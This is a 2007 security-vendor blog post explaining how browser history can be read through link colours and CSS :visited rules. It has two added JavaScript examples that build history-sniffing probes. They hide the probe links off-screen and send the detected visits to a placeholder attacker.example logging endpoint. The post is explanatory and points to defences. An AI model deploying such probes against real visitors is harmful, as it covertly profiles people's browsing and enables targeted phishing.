Security Response

Revealing Web History Without JavaScript

Created: 06 Apr 2007 07:00:00 GMT • Updated: 23 Jan 2014 18:50:34 GMT
By Symantec Security Response

In 2006, Web security expert Jeremiah Grossman came up with an interesting attack that can be used to read the history of visitors to a Web page using only a simple piece of JavaScript. In February 2007, RSnake came up with a modification of this attack that does not need JavaScript or any other scripting language. This is a rediscovery of an attack described by Andrew Clover in 2002.

In the original proof of concept, a Web site was set up with a script that lists the sites the user had visited. This was done by creating a set of links to URLs chosen by the attacker and looking up the rendered color of each link's text. If the link had been visited, the browser rendered it in a different color than if it had not. The script goes through each of the links, checks the colors and reports the results back to the owner of the site.
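The JavaScript variant described above, as an added example that is not Grossman's proof of concept or any code from the original post. The comparison logic is kept in a pure function so it can be exercised without a browser; `probeHistory()` wires it to the real DOM. The candidate URLs, the control URL and the `attacker.example` reporting endpoint are constructed placeholders. Note that current browsers neutralise this exact probe by reporting the unvisited style from `getComputedStyle()` for `:visited` links, so in a modern browser `probeHistory()` returns an empty list regardless of history.

```javascript
// Added example (not from the original post): the JavaScript history probe.
// classify() is pure and testable; probeHistory() uses the DOM when present.
// All URLs are constructed placeholders.

// Candidate URLs the attacker wants to test. :visited matches the exact URL,
// so each variant (http/https, trailing slash) is a separate probe.
const CANDIDATES = [
  "https://bank.example/login",
  "https://bank.example/login/",
  "http://competitor.example/",
  "https://mail.example/inbox",
];

// Control: a URL nobody can have visited. Its rendered colour is the
// "unvisited" colour under this page's stylesheet, so the probe does not
// need to hard-code the browser's default link colours.
const CONTROL_URL = "https://never-visited-" + Date.now() + ".invalid/";

// Returns the subset of candidate URLs whose rendered colour differs from the
// control link's colour. readColor is injected: in a browser it wraps
// getComputedStyle(); a test can pass a fake reader.
function classify(candidates, readColor) {
  const unvisited = readColor(CONTROL_URL);
  const visited = [];
  for (const url of candidates) {
    if (readColor(url) !== unvisited) visited.push(url);
  }
  return visited;
}

// Browser wiring: create <a href=url>, attach it so it gets styled, read the
// computed text colour, then remove it again.
function domColorReader(doc) {
  return function (url) {
    const a = doc.createElement("a");
    a.href = url;
    a.textContent = url;
    doc.body.appendChild(a);
    const color = doc.defaultView.getComputedStyle(a).color;
    doc.body.removeChild(a);
    return color;
  };
}

// Entry point for a browser. Modern browsers report the unvisited style for
// :visited links here, so this now yields [] regardless of history.
function probeHistory() {
  if (typeof document === "undefined") return [];
  return classify(CANDIDATES, domColorReader(document));
}

// In the original attack the hits were sent to the attacker's server, for
// example by setting an <img> src to this URL (endpoint is an assumption).
function reportUrl(visited) {
  return "https://attacker.example/log?v=" + encodeURIComponent(visited.join(","));
}
```

The control link is the detail that makes the probe portable: a page-level stylesheet can change both the visited and unvisited colours, so comparing against a link that cannot be in the history is more reliable than comparing against fixed colour values.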

In the new version of this attack, Cascading Style Sheets (CSS) are used to achieve the same result without using JavaScript. This can be done by using the ‘a:visited’ pseudo-class in CSS to create conditional logic. The nature of CSS allows different behaviors to be activated for links depending on whether they have been visited. Traditionally, this was used for changing the color of link text if the link had been previously visited. The power of CSS to customize these sorts of attributes can be used to activate further content if the link is in the viewer’s history. In the proof of concept for this attack, every link on the page is set up so that, if it has been visited, a background image pointing to a CGI script is loaded. Because the browser only requests that image for visited links, the request itself is the signal: the script informs the attacker of the IP address of the visitor and that the link is in the visitor’s history.
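The scriptless variant, as an added example rather than RSnake's proof of concept: a generator for the probe page, plus the one piece of server-side logic the logging endpoint needs. Each link gets its own `a:visited` rule whose `background-image` points at a per-link URL on the logger, so the browser makes that request only when the link is in its history and the logger learns the visitor's IP address and which link matched. The `attacker.example` endpoint and the target list are constructed placeholders.

```javascript
// Added example (not the original proof of concept): build the CSS-only
// history probe page and decode the resulting hits on the server side.
// Hostnames are constructed placeholders.

const LOG_ENDPOINT = "https://attacker.example/hit"; // assumed logging endpoint

const TARGETS = [
  "https://bank.example/login",
  "https://otherbank.example/",
  "https://competitor.example/cart",
];

// Minimal escaping so a target URL cannot break out of the HTML attribute or
// the CSS url() token. Adequate for the URLs above, not a general sanitiser.
function escapeAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;");
}
function cssString(s) {
  return '"' + s.replace(/\\/g, "\\\\").replace(/"/g, '\\"') + '"';
}

// One selector per link. Only the link's index travels to the logger; the
// server maps it back to the target, so the image URLs never reveal the
// target list to anyone inspecting the request.
function buildCss(targets) {
  const rules = targets.map((_, i) =>
    "#p" + i + ":visited { background-image: url(" +
      cssString(LOG_ENDPOINT + "?id=" + i) + "); }");
  // Keep the probe links rendered but off-screen so the visitor does not
  // notice a wall of links.
  rules.push("#probes a { position: absolute; left: -9999px; }");
  return rules.join("\n");
}

// The complete probe page: no <script> element anywhere.
function buildHtml(targets) {
  const links = targets.map((url, i) =>
    '<a id="p' + i + '" href="' + escapeAttr(url) + '">' + escapeAttr(url) + "</a>");
  return "<!doctype html>\n<html><head><style>\n" + buildCss(targets) +
    "\n</style></head><body>\n<div id=\"probes\">\n" + links.join("\n") +
    "\n</div>\n</body></html>\n";
}

// Server side: given the query string of an incoming image request, return
// the target URL that is in the visitor's history, or null for an unknown
// or malformed id. The client IP comes from the connection, not the query.
function decodeHit(query, targets) {
  const m = /(?:^|[?&])id=(\d+)(?:&|$)/.exec(query);
  if (!m) return null;
  const i = Number(m[1]);
  return i < targets.length ? targets[i] : null;
}
```

Because the signal is a plain image fetch, the probe works with scripting disabled, and nothing in the page's markup looks out of place to a casual viewer; the defence has to come from the browser's handling of `:visited`, not from a content filter.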

This attack is not equivalent to being able to steal a user’s entire history. In this case, the attacker only has the ability to query whether the user has visited a specific URL chosen in advance. This attack could be used by companies trying to profile the interests of visitors for targeted advertising, by merchants checking to see which competitors a visitor to their site has visited, or for other more devious information-gathering tasks. For example, phishers could use it to identify which banks a user frequents and use that information to send targeted phishing attacks.

This interesting type of breach in privacy results from the browser’s ability to access its own history and use that information to modify the pages it displays. CSS is a powerful tool for Web design, but since it can be used to create conditional logic based on automatic input from the browser, it can also lead to this type of attack. One way to prevent this attack is to use the Firefox plug-in SafeHistory. The paper Protecting browser state from web privacy attacks by Jackson et al. (WWW 2006) discusses further ramifications of this CSS design decision and possible ways to protect against it.